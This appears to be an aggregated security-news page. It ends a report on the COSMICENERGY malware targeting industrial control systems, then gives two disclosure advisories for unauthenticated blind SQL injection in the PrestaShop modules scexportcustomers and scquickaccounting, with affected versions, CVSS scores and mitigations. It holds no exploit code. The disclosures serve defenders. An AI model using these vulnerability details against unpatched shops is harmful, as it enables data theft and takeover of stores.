PIEHOP is then run on the machine to upload LIGHTWORK to the server, which sends disruptive commands to connected industrial devices. It also immediately deletes the executable after issuing the commands.

"While COSMICENERGY's capabilities are not significantly different from previous OT malware families', its discovery highlights several notable developments in the OT threat landscape," Mandiant said.

"The discovery of new OT malware presents an immediate threat to affected organizations, since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New COSMICENERGY Malware Exploits ICS Protocol to Sabotage Power Grids

In the Store Commander scexportcustomers module for PrestaShop through 3.6.1, sensitive SQL calls can be executed with a trivial HTTP request and exploited to forge a blind SQL injection.

In the module “SC Export Customers” (scexportcustomers), an anonymous user can perform SQL injections. The module have been patched in version 3.6.2.

**Summary**

*   **CVE ID**: CVE-2023-33278
*   **Published at**: 2023-05-25
*   **Platform**: PrestaShop
*   **Product**: scexportcustomers
*   **Impacted release**: <= 3.6.1 (3.6.2 fixed the vulnerability)
*   **Product author**: Store Commander
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

In scexportcustomers module up to 3.6.1 for PrestaShop, a sensitive SQL call can be executed with a trivial http call and exploited to forge a blind SQL injection.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Other recommandations**

*   It’s recommended to delete the module if not used or contact Store Commander
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”)
*   Change the default database prefix ps\_ by a new longer arbitrary prefix. Nethertheless, be warned that this is useless against blackhat with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2022-09-21

Issue discovered after a security audit by 202-ecommerce

2022-09-21

Contact Author

2022-12-09

Author provide patch

2023-05-15

Request a CVE ID

2023-05-22

Received CVE ID

Store Commander thanks 202-ecommerce for its courtesy and its help after the vulnerability disclosure.

**Links**

*   Store Commander export customer module product page
*   National Vulnerability Database

CVE-2023-33278: [CVE-2023-33278] Improper neutralization of multiple SQL parameters in the scexportcustomers module for PrestaShop

In the Store Commander scquickaccounting module for PrestaShop through 3.7.3, multiple sensitive SQL calls can be executed with a trivial HTTP request and exploited to forge a blind SQL injection.

In the module “SC Quick Accounting” (scquickaccounting), an anonymous user can perform a SQL injection. The module have been patched in version 3.7.4.

**Summary**

*   **CVE ID**: CVE-2023-33280
*   **Published at**: 2023-05-25
*   **Platform**: PrestaShop
*   **Product**: scquickaccounting
*   **Impacted release**: <= 3.7.3 (3.7.4 fixed the vulnerability)
*   **Product author**: Store Commander
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

In scquickaccounting module up to 3.7.3 for PrestaShop, multiple sensitive SQL calls can be executed with a trivial http call and exploited to forge a SQL injection.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Other recommandations**

*   It’s recommended to delete the module if not used or contact Store Commander
*   You should restrict access to this URI pattern : modules/scquickaccounting/ to a given whitelist
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”)
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nethertheless, be warned that this is useless against blackhat with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2022-09-21

Issue discovered after a security audit by 202-ecommerce and TouchWeb

2022-09-21

Contact Author

2022-12-09

Author provide patch

2023-05-15

Request a CVE ID

2023-05-22

Received CVE ID

Store Commander thanks 202-ecommerce and TouchWeb for their courtesy and their help after the vulnerability disclosure.

**Links**

*   Store Commander export orders module product page
*   National Vulnerability Database

Tag

#sql